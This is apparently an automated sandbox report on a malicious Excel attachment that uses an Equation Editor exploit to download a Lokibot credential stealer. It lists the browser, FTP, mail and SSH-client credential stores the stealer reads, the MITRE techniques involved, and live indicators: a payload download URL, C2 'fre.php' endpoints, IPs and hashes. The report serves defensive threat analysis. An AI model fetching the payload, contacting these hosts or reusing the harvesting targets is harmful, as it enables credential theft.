Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: HeapCreate, PopPassword		4_2_0040D069
Source: C:\Users\Public\vbc.exe	Code function: HeapCreate, SmtpPassword		4_2_0040D069

Source: Yara match	File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Lokibot

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	Credentials in Registry2	File and Directory Discovery2	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information21	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing2	NTDS	Query Registry1	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Security Software Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection12	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe	36%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\vbc.exe	36%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.vbc.exe.220e50.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.3.vbc.exe.240000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
cutt.ly	1%	Virustotal	Browse
becharnise.ir	17%	Virustotal	Browse
stdyrusschinetwomast.dns.army	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://kbfvzoboss.bid/alien/fre.php	14%	Virustotal		Browse
http://kbfvzoboss.bid/alien/fre.php	0%	Avira URL Cloud	safe
http://alphastand.win/alien/fre.php	10%	Virustotal		Browse
http://alphastand.win/alien/fre.php	0%	Avira URL Cloud	safe
http://alphastand.trade/alien/fre.php	11%	Virustotal		Browse
http://alphastand.trade/alien/fre.php	0%	Avira URL Cloud	safe
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe	10%	Virustotal		Browse
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe	100%	Avira URL Cloud	malware
http://alphastand.top/alien/fre.php	0%	Avira URL Cloud	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://becharnise.ir/fa13/fre.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cutt.ly	172.67.8.238	true	false	1%, Virustotal, Browse	unknown
becharnise.ir	185.208.180.121	true	true	17%, Virustotal, Browse	unknown
stdyrusschinetwomast.dns.army	103.141.138.123	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://alphastand.win/alien/fre.php	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://alphastand.trade/alien/fre.php	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	true	Avira URL Cloud: safe	unknown
http://becharnise.ir/fa13/fre.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp	false		high
http://www.day.com/dam/1.0	83553F27.emf.0.dr	false		high
http://www.ibsensoftware.com/	vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.8.238	unknown	United States	13335	CLOUDFLARENETUS	false
103.141.138.123	unknown	Viet Nam	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
185.208.180.121	unknown	Iran (ISLAMIC Republic Of)	48147	AMINIDCIR	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	353332
Start date:	16.02.2021
Start time:	07:01:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MV FORTUNE TRADER.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.7% (good quality ratio 40.8%) Quality average: 75.8% Quality standard deviation: 29.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:02:10	API Interceptor	57x Sleep call for process: EQNEDT32.EXE modified
07:02:16	API Interceptor	419x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.8.238	Inquiry Bulgaria.xls	Get hash	malicious	Browse	cutt.ly/AkBqUvK
172.67.8.238	DHL-correction.xlsx	Get hash	malicious	Browse	cutt.ly/
103.141.138.123	E68-STD-239-2020-239.xlsx	Get hash	malicious	Browse	stdyrusschinetwomast.dns.army/receiprt/regasm.exe
	ETD 4.2 INOVOICE, PACKING LIST.xlsx	Get hash	malicious	Browse	stdyrusschine2mastab.dns.army/documenst/regasm.exe
	INQ 20-26626-0222.xlsx	Get hash	malicious	Browse	stdyrusschine2mastab.dns.army/documenst/regasm.exe
	BSL 21 PYT.xlsx	Get hash	malicious	Browse	sndyrusschine2masnbc.dns.army/documernt/regasm.exe
	VM ASIAN CHAMPION.xlsx	Get hash	malicious	Browse	russchine2wsdymapaws.dns.navy/russdoc/regasm.exe
	VM ASIAN CHAMPION.xlsx	Get hash	malicious	Browse	russchine2wsdymapaws.dns.navy/russdoc/regasm.exe
	VM ASIAN CHAMPION.xlsx	Get hash	malicious	Browse	stdyrusschine2mapafr.dns.army/russdoc/regasm.exe
	NEW ORDER.xlsx	Get hash	malicious	Browse	sndyrusschine2mapanx.dns.army/russdoc/regasm.exe
	Remittance Advice_usd9534.46.xlsx	Get hash	malicious	Browse	russchine2sndymapanxmenischangednetsncm.ydns.eu/russdoc/regasm.exe
	Remittance Advice_usd9534.46.xlsx	Get hash	malicious	Browse	russchine2sndymapanxmenischangednetsncm.ydns.eu/russdoc/regasm.exe
	INV_F3C-20CX-F3C05.xlsx	Get hash	malicious	Browse	tudyrusschine2mapanxmenischangednetuicm.ydns.eu/russdoc/regasm.exe
	MV JIN SHENG SHUI.xlsx	Get hash	malicious	Browse	russchine2stdymapanxmenischangednestvdq.ydns.eu/russdoc/regasm.exe
	TMB-CI2006-003.xlsx	Get hash	malicious	Browse	thdyrusschine2mapanxmenischangednethnbc.ydns.eu/russdoc/regasm.exe
185.208.180.121	1BcHGhheBy.exe	Get hash	malicious	Browse	becharnise.ir/fa15/fre.php
	New Order.doc	Get hash	malicious	Browse	becharnise.ir/fa15/fre.php
	PO. pdf.exe	Get hash	malicious	Browse	becharnise.ir/fa12/fre.php
	PI2rBmugqT.exe	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	P.I 467301.xlsx	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	TMFZ3kZZ4L.exe	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	Funds Info.xlsx	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	6vsSE5VaSM.exe	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	fBcCR6EOOW.exe	Get hash	malicious	Browse	becharnise.ir/fa16/fre.php
	RFQ 1002.xlsx	Get hash	malicious	Browse	becharnise.ir/fa1/fre.php
	TELEGRAPHIC TRANSFER.xlsx	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exe	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exe	Get hash	malicious	Browse	becharnise.ir/fa18/fre.php
	scan00006.xlsx	Get hash	malicious	Browse	becharnise.ir/fa16/fre.php
	Payment Swift.xlsx	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	DHL INVOICE .exe	Get hash	malicious	Browse	becharnise.ir/fox/fre.php
	MFxGaBGmS2.exe	Get hash	malicious	Browse	becharnise.ir/tws/fre.php
	516Lnlw30O.exe	Get hash	malicious	Browse	becharnise.ir/fa11/fre.php
	L2WxaHfgd1.exe	Get hash	malicious	Browse	becharnise.ir/fa16/fre.php
	RFQ WBH00738_.xlsx	Get hash	malicious	Browse	becharnise.ir/tws/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cutt.ly	Purchase Order.xlsx	Get hash	malicious	Browse	172.67.8.238
	Inquiry Bulgaria.xls	Get hash	malicious	Browse	172.67.8.238
	Inquiry Bulgaria.xls	Get hash	malicious	Browse	104.22.1.232
	ProtectedAdviceSlip.xls	Get hash	malicious	Browse	104.22.0.232
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	DHL_PRG201123213594.xlsx	Get hash	malicious	Browse	104.22.1.232
	P.I 467301.xlsx	Get hash	malicious	Browse	172.67.8.238
	Eur Swift copy.xlsx	Get hash	malicious	Browse	104.22.0.232
	RFQ 2027376.xlsx	Get hash	malicious	Browse	104.22.1.232
	PL + CI.xlsx	Get hash	malicious	Browse	104.22.0.232
	Funds Info.xlsx	Get hash	malicious	Browse	104.22.1.232
	Gresik Port Enquiry.xlsx	Get hash	malicious	Browse	172.67.8.238
	aaHyijkXFm.docx	Get hash	malicious	Browse	172.67.8.238
	aaHyijkXFm.docx	Get hash	malicious	Browse	104.22.0.232
	Inquiry from Pure fine food Ltd.xlsx	Get hash	malicious	Browse	104.22.0.232
	RFQ 1002.xlsx	Get hash	malicious	Browse	104.22.1.232
	MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx	Get hash	malicious	Browse	104.22.1.232
	COVER LETTER SWFT200022823419.xlsx	Get hash	malicious	Browse	104.22.1.232
	GRAND DEMETER_INV210211_00.xlsx	Get hash	malicious	Browse	172.67.8.238
	Invoice 3110201031.xlsx	Get hash	malicious	Browse	104.22.0.232
becharnise.ir	1BcHGhheBy.exe	Get hash	malicious	Browse	185.208.180.121
	New Order.doc	Get hash	malicious	Browse	185.208.180.121
	PO. pdf.exe	Get hash	malicious	Browse	185.208.180.121
	PI2rBmugqT.exe	Get hash	malicious	Browse	185.208.180.121
	P.I 467301.xlsx	Get hash	malicious	Browse	185.208.180.121
	TMFZ3kZZ4L.exe	Get hash	malicious	Browse	185.208.180.121
	Funds Info.xlsx	Get hash	malicious	Browse	185.208.180.121
	6vsSE5VaSM.exe	Get hash	malicious	Browse	185.208.180.121
	fBcCR6EOOW.exe	Get hash	malicious	Browse	185.208.180.121
	RFQ 1002.xlsx	Get hash	malicious	Browse	185.208.180.121
	TELEGRAPHIC TRANSFER.xlsx	Get hash	malicious	Browse	185.208.180.121
	SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exe	Get hash	malicious	Browse	185.208.180.121
	SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exe	Get hash	malicious	Browse	185.208.180.121
	scan00006.xlsx	Get hash	malicious	Browse	185.208.180.121
	Payment Swift.xlsx	Get hash	malicious	Browse	185.208.180.121
	DHL INVOICE .exe	Get hash	malicious	Browse	185.208.180.121
	MFxGaBGmS2.exe	Get hash	malicious	Browse	185.208.180.121
	516Lnlw30O.exe	Get hash	malicious	Browse	185.208.180.121
	L2WxaHfgd1.exe	Get hash	malicious	Browse	185.208.180.121
	RFQ WBH00738_.xlsx	Get hash	malicious	Browse	185.208.180.121
stdyrusschinetwomast.dns.army	E68-STD-239-2020-239.xlsx	Get hash	malicious	Browse	103.141.138.123

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMINIDCIR	1BcHGhheBy.exe	Get hash	malicious	Browse	185.208.180.121
	New Order.doc	Get hash	malicious	Browse	185.208.180.121
	PO. pdf.exe	Get hash	malicious	Browse	185.208.180.121
	PI2rBmugqT.exe	Get hash	malicious	Browse	185.208.180.121
	P.I 467301.xlsx	Get hash	malicious	Browse	185.208.180.121
	TMFZ3kZZ4L.exe	Get hash	malicious	Browse	185.208.180.121
	Funds Info.xlsx	Get hash	malicious	Browse	185.208.180.121
	6vsSE5VaSM.exe	Get hash	malicious	Browse	185.208.180.121
	fBcCR6EOOW.exe	Get hash	malicious	Browse	185.208.180.121
	RFQ 1002.xlsx	Get hash	malicious	Browse	185.208.180.121
	TELEGRAPHIC TRANSFER.xlsx	Get hash	malicious	Browse	185.208.180.121
	SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exe	Get hash	malicious	Browse	185.208.180.121
	SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exe	Get hash	malicious	Browse	185.208.180.121
	scan00006.xlsx	Get hash	malicious	Browse	185.208.180.121
	Payment Swift.xlsx	Get hash	malicious	Browse	185.208.180.121
	DHL INVOICE .exe	Get hash	malicious	Browse	185.208.180.121
	MFxGaBGmS2.exe	Get hash	malicious	Browse	185.208.180.121
	516Lnlw30O.exe	Get hash	malicious	Browse	185.208.180.121
	L2WxaHfgd1.exe	Get hash	malicious	Browse	185.208.180.121
	RFQ WBH00738_.xlsx	Get hash	malicious	Browse	185.208.180.121
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	Quotation(6656).exe	Get hash	malicious	Browse	103.89.88.238
	Quotation-15-02-2021_PDF.exe	Get hash	malicious	Browse	103.114.106.35
	swift copy.exe	Get hash	malicious	Browse	103.89.88.238
	gyhHPdvJt1.exe	Get hash	malicious	Browse	103.151.123.132
	P.I 467301.xlsx	Get hash	malicious	Browse	103.99.1.173
	Remittance copy.xlsx	Get hash	malicious	Browse	103.99.1.145
	Eur Swift copy.xlsx	Get hash	malicious	Browse	103.99.1.158
	RFQ 2027376.xlsx	Get hash	malicious	Browse	103.141.138.128
	Quotation_11-02-2021_WSBDJ.exe	Get hash	malicious	Browse	103.114.106.35
	PL + CI.xlsx	Get hash	malicious	Browse	103.141.138.125
	Funds Info.xlsx	Get hash	malicious	Browse	103.99.1.173
	Scan_ 11 Feb 2021 at 1.25_Bz5543_PDF.exe	Get hash	malicious	Browse	103.114.107.184
	Signed PO202002FiveBro2A2.exe	Get hash	malicious	Browse	103.151.123.132
	Gresik Port Enquiry.xlsx	Get hash	malicious	Browse	180.214.238.131
	SKM_C258201001130020005057.exe	Get hash	malicious	Browse	103.151.123.132
	Scan_ 10 Feb 2021 at 1.45_Bz5543_PDF.exe	Get hash	malicious	Browse	103.114.107.184
	SKM_C258201001130020005057.exe	Get hash	malicious	Browse	103.151.123.132
	Inquiry from Pure fine food Ltd.xlsx	Get hash	malicious	Browse	103.141.138.118
	RFQ 1002.xlsx	Get hash	malicious	Browse	103.141.138.125
	MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx	Get hash	malicious	Browse	103.140.251.164
CLOUDFLARENETUS	tS9P6wPz9x.exe	Get hash	malicious	Browse	104.21.78.13
	SecuriteInfo.com.Generic.mg.44669e0ff064dfc9.dll	Get hash	malicious	Browse	104.20.185.68
	SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll	Get hash	malicious	Browse	104.20.185.68
	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Get hash	malicious	Browse	104.20.184.68
	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	104.20.184.68
	B62672021 PRETORIA.doc	Get hash	malicious	Browse	104.21.45.223
	NJPcHPuRcG.dll	Get hash	malicious	Browse	104.20.184.68
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	104.20.184.68
	13xakh1PtD.dll	Get hash	malicious	Browse	104.20.184.68
	RFQ.xls	Get hash	malicious	Browse	104.20.139.65
	DUcKsYsyX0.dll	Get hash	malicious	Browse	104.20.184.68
	RI51uAIUyL.dll	Get hash	malicious	Browse	104.20.184.68
	IVJq3tVi96.exe	Get hash	malicious	Browse	104.21.19.200
	Doc0538-2-21.xls	Get hash	malicious	Browse	104.20.138.65
	COTIZACI#U00d3N.exe	Get hash	malicious	Browse	104.21.19.200
	REQUEST FOR QOUTATION.exe	Get hash	malicious	Browse	104.21.19.200
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	162.159.133.233
	Shipping Documents Original BL, Invoice & Packing List.exe	Get hash	malicious	Browse	172.67.188.154
	aS94x3Qp1s.exe	Get hash	malicious	Browse	104.21.19.200
	Purchase Order.xlsx	Get hash	malicious	Browse	172.67.8.238

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	significant (92).xls	Get hash	malicious	Browse	172.67.8.238
	necessary (47).xls	Get hash	malicious	Browse	172.67.8.238
	Purchase Order.xlsx	Get hash	malicious	Browse	172.67.8.238
	cotizacin.doc	Get hash	malicious	Browse	172.67.8.238
	Revised Order 193-002.doc	Get hash	malicious	Browse	172.67.8.238
	DOCUMENT (63).xls	Get hash	malicious	Browse	172.67.8.238
	estimated (99).xls	Get hash	malicious	Browse	172.67.8.238
	documents (29).xls	Get hash	malicious	Browse	172.67.8.238
	DkELZjJtGY.xlsm	Get hash	malicious	Browse	172.67.8.238
	DHL - SL720073066537TX(3).docx	Get hash	malicious	Browse	172.67.8.238
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	DHL_PRG201123213594.xlsx	Get hash	malicious	Browse	172.67.8.238
	selfassessment.docm	Get hash	malicious	Browse	172.67.8.238
	selfassessment.docm	Get hash	malicious	Browse	172.67.8.238
	P.I 467301.xlsx	Get hash	malicious	Browse	172.67.8.238
	Remittance copy.xlsx	Get hash	malicious	Browse	172.67.8.238
	Eur Swift copy.xlsx	Get hash	malicious	Browse	172.67.8.238
	RFQ 2027376.xlsx	Get hash	malicious	Browse	172.67.8.238
	TKL Steel Quotation.doc	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.doc	Get hash	malicious	Browse	172.67.8.238

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0737496840385012
Encrypted:	false
SSDEEP:	6:kKDQZbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:LQA3kPlE99SNxAhUeo+aKt
MD5:	B54E87F83B8F07BB438A682306059DDA
SHA1:	4AE56DB76D87A5FD04D403F3EC6064475D1BB1D7
SHA-256:	81FBD3AF5D94928932AA195BEF6DD9A4E0AD98669B8FA52701FCE2114E1DCD34
SHA-512:	7F9F34C6BE796D7120D09E5FC73793693C6E1982830E8C6DA1969D136EBC4AC07C8C1DD389E67F2218EF9550310123E0F3E7EE629652059582E2E12B31E0CAEE
Malicious:	false
Reputation:	low
Preview:	p...... ..........A.u...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	269312
Entropy (8bit):	6.728521643538962
Encrypted:	false
SSDEEP:	6144:T1wUIRkrbJzmFuERDOm+dwclg+8Iy+8Cl9Tf6BxUemJ:T1ORkr1CFuERD9+yb+R8k9TS79mJ
